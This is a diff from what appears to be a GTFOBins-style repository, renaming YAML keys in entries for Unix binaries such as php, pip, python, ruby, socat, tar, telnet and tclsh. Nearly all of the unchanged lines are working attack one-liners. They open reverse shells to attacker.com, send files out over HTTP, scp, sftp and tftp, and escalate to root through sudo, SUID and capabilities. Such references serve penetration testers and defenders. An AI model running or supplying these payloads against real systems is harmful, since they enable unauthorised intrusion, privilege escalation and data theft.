sudo pg /etc/profile
!/bin/sh
suid-enabled:
suid:
- code: ./pg file_to_read
---

View File

@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
export CMD="/bin/sh"
php -r 'system(getenv("CMD"));'
@ -16,37 +16,37 @@ functions:
- code: |
export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
execute-non-interactive:
command:
- code: |
export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
upload:
file-upload:
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
code: |
LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
suid-enabled:
suid:
- code: |
CMD="/bin/sh"
./php -r "system('$CMD');"
sudo-enabled:
sudo:
- code: |
CMD="/bin/sh"
sudo php -r "system('$CMD');"
capabilities-enabled:
capabilities:
- code: |
CMD="/bin/sh"
./php -r "posix_setuid(0); system('$CMD');"

View File

@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp)
echo 'exec sh' > $TF
@ -14,14 +14,14 @@ functions:
^O
file-read:
- code: pico file_to_read
suid-enabled:
suid:
- code: |
TF=$(mktemp)
echo 'exec sh -p' > $TF
chmod +x $TF
./pico -s $TF /etc/hosts
^T
sudo-enabled:
sudo:
- code: |
TF=$(mktemp)
echo 'exec sh' > $TF

View File

@ -1,11 +1,11 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
pip install $TF
reverse-shell-interactive:
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -16,7 +16,7 @@ functions:
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' > $TF/setup.py
pip install $TF
upload:
file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
@ -36,7 +36,7 @@ functions:
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
pip install $TF
download:
file-download:
- description: Fetch a remote file via HTTP GET request. It needs an absolute local file path.
code: |
export URL=http://attacker.com/file_to_get
@ -60,12 +60,12 @@ functions:
TF=$(mktemp -d)
echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py
pip install $TF
load-library:
library-load:
- code: |
TF=$(mktemp -d)
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
pip install $TF
sudo-enabled:
sudo:
- code: |
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

View File

@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
file-write:
@ -13,7 +13,7 @@ functions:
code: |
export LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE
sudo-enabled:
sudo:
- code: |
sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
---

View File

@ -1,9 +1,9 @@
---
description: The payloads are compatible with both Python version 2 and 3.
functions:
execute-interactive:
shell:
- code: python -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive:
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -12,7 +12,7 @@ functions:
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'
upload:
file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
@ -28,7 +28,7 @@ functions:
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
@ -41,12 +41,12 @@ functions:
- code: python -c 'open("file_to_write","w+").write("DATA")'
file-read:
- code: python -c 'print(open("file_to_read").read())'
load-library:
library-load:
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
suid-enabled:
suid:
- code: ./python -c 'import os; os.system("/bin/sh -p")'
sudo-enabled:
sudo:
- code: sudo python -c 'import os; os.system("/bin/sh")'
capabilities-enabled:
capabilities:
- code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
---

View File

@ -1,14 +1,14 @@
---
functions:
execute-interactive:
shell:
- code: rlwrap /bin/sh
file-write:
- description: This adds timestamps to the output file. This relies on the external `echo` command.
code: |
LFILE=file_to_write
rlwrap -l "$LFILE" echo DATA
suid-enabled:
suid:
- code: ./rlwrap -H /dev/null /bin/sh -p
sudo-enabled:
sudo:
- code: sudo rlwrap /bin/sh
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
suid:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled:
sudo:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
suid:
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled:
sudo:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo-enabled:
sudo:
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
suid-enabled:
suid:
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
---

View File

@ -1,19 +1,19 @@
---
functions:
execute-interactive:
shell:
- code: ruby -e 'exec "/bin/sh"'
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
upload:
file-upload:
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
@ -25,10 +25,10 @@ functions:
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
file-read:
- code: ruby -e 'puts File.read("file_to_read")'
load-library:
library-load:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
sudo-enabled:
sudo:
- code: sudo ruby -e 'exec "/bin/sh"'
capabilities-enabled:
capabilities:
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
---

View File

@ -1,30 +1,30 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
scp -S $TF x y:
upload:
file-upload:
- description: Send local file to a SSH server.
code: |
RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send
scp $LFILE $RPATH
download:
file-download:
- description: Fetch a remote file from a SSH server.
code: |
RPATH=user@attacker.com:~/file_to_get
LFILE=file_to_save
scp $RPATH $LFILE
sudo-enabled:
sudo:
- code: |
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
suid-limited:
limited-suid:
- code: |
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- description: GNU version only. Also, this requires `bash`.
code: sed -n '1e exec sh 1>&0' /etc/hosts
execute-non-interactive:
command:
- description: GNU version only.
code: sed -n "1e id" /etc/hosts
file-write:
@ -14,11 +14,11 @@ functions:
- code: |
LFILE=file_to_read
sed '' "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./sed -e '' "$LFILE"
sudo-enabled:
sudo:
- description: GNU version only. Also, this requires `bash`.
code: sudo sed -n '1e exec sh 1>&0 /etc/hosts
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: setarch $(arch) /bin/sh
suid-enabled:
suid:
- code: ./setarch $(arch) /bin/sh -p
sudo-enabled:
sudo:
- code: sudo setarch $(arch) /bin/sh
---

View File

@ -1,23 +1,23 @@
---
functions:
execute-interactive:
shell:
- code: |
HOST=user@attacker.com
sftp $HOST
!/bin/sh
upload:
file-upload:
- description: Send local file to a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
put file_to_send file_to_save
download:
file-download:
- description: Fetch a remote file from a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
get file_to_get file_to_save
sudo-enabled:
sudo:
- code: |
HOST=user@attacker.com
sudo sftp $HOST

View File

@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_write
shuf -e DATA -o "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_write
./shuf -e DATA -o "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_write
sudo shuf -e DATA -o "$LFILE"

View File

@ -1,11 +1,11 @@
---
description: A valid SMB/CIFS server must be available.
functions:
execute-interactive:
shell:
- code: |
smbclient \\ip\share
!/bin/sh
sudo-enabled:
sudo:
- code: |
sudo smbclient \\ip\share
!/bin/sh

View File

@ -1,23 +1,23 @@
---
functions:
reverse-shell-interactive:
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive:
bind-shell:
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
code: |
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
sudo-enabled:
sudo:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
suid-limited:
limited-suid:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com

View File

@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
sort -m "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./sort -m "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo sort -m "$LFILE"

View File

@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: sqlite3 /dev/null '.shell /bin/sh'
file-write:
- code: |
@ -14,8 +14,8 @@ functions:
.import $LFILE t
SELECT * FROM t;
EOF
sudo-enabled:
sudo:
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
suid-limited:
limited-suid:
- code: "./sqlite3 /dev/null '.shell /bin/sh'"
---

View File

@ -1,18 +1,18 @@
---
functions:
execute-interactive:
shell:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
upload:
file-upload:
- description: Send local file to a SSH server.
code: |
HOST=user@attacker.com
RPATH=file_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
download:
file-download:
- description: Fetch a remote file from a SSH server.
code: |
HOST=user@attacker.com
@ -24,7 +24,7 @@ functions:
code: |
LFILE=file_to_read
ssh -F $LFILE localhost
sudo-enabled:
sudo:
- description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: stdbuf -i0 /bin/sh
suid-enabled:
suid:
- code: ./stdbuf -i0 /bin/sh -p
sudo-enabled:
sudo:
- code: sudo stdbuf -i0 /bin/sh
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: strace -o /dev/null /bin/sh
suid-enabled:
suid:
- code: ./strace -o /dev/null /bin/sh -p
sudo-enabled:
sudo:
- code: sudo strace -o /dev/null /bin/sh
---

View File

@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
tail -c1G "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./tail -c1G "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo tail -c1G "$LFILE"

View File

@ -1,8 +1,8 @@
---
functions:
execute-interactive:
shell:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive:
command:
- description: This only works for GNU tar.
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
file-write:
@ -17,8 +17,8 @@ functions:
code: |
LFILE=file_to_read
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
sudo-enabled:
sudo:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited:
limited-suid:
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: taskset 1 /bin/sh
suid-enabled:
suid:
- code: ./taskset 1 /bin/sh -p
sudo-enabled:
sudo:
- code: sudo taskset 1 /bin/sh
---

View File

@ -1,20 +1,20 @@
---
functions:
execute-interactive:
shell:
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive:
non-interactive-reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
suid-enabled:
suid:
- code: |
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr
sudo-enabled:
sudo:
- code: |
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

View File

@ -1,14 +1,14 @@
---
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
functions:
execute-non-interactive:
command:
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
sudo-enabled:
sudo:
- code: |
COMMAND='id'
TF=$(mktemp)

View File

@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_write
echo DATA | ./tee -a "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_write
echo DATA | ./tee -a "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"

View File

@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
@ -8,14 +8,14 @@ functions:
telnet $RHOST $RPORT
^]
!/bin/sh
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
TF=$(mktemp -u)
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled:
sudo:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
@ -23,7 +23,7 @@ functions:
sudo telnet $RHOST $RPORT
^]
!/bin/sh
suid-limited:
limited-suid:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com

View File

@ -1,24 +1,24 @@
---
functions:
upload:
file-upload:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
put file_to_send
download:
file-download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
get file_to_get
suid-enabled:
suid:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
./tftp $RHOST
put file_to_send
sudo-enabled:
sudo:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com

View File

@ -1,10 +1,10 @@
---
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
functions:
execute-interactive:
shell:
- code: /usr/bin/time /bin/sh
suid-enabled:
suid:
- code: ./time /bin/sh -p
sudo-enabled:
sudo:
- code: sudo /usr/bin/time /bin/sh
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: timeout 7d /bin/sh
suid-enabled:
suid:
- code: ./timeout 7d /bin/sh -p
sudo-enabled:
sudo:
- code: sudo timeout --foreground 7d /bin/sh
---

View File

@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
ul "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./ul "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo ul "$LFILE"

View File

@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
unexpand -t99999999 "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./unexpand -t99999999 "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo unexpand -t99999999 "$LFILE"

View File

@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
uniq "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./uniq "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo uniq "$LFILE"

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: unshare /bin/sh
suid-enabled:
suid:
- code: ./unshare -r /bin/sh
sudo-enabled:
sudo:
- code: sudo unshare /bin/sh
---

Some files were not shown because too many files have changed in this diff Show More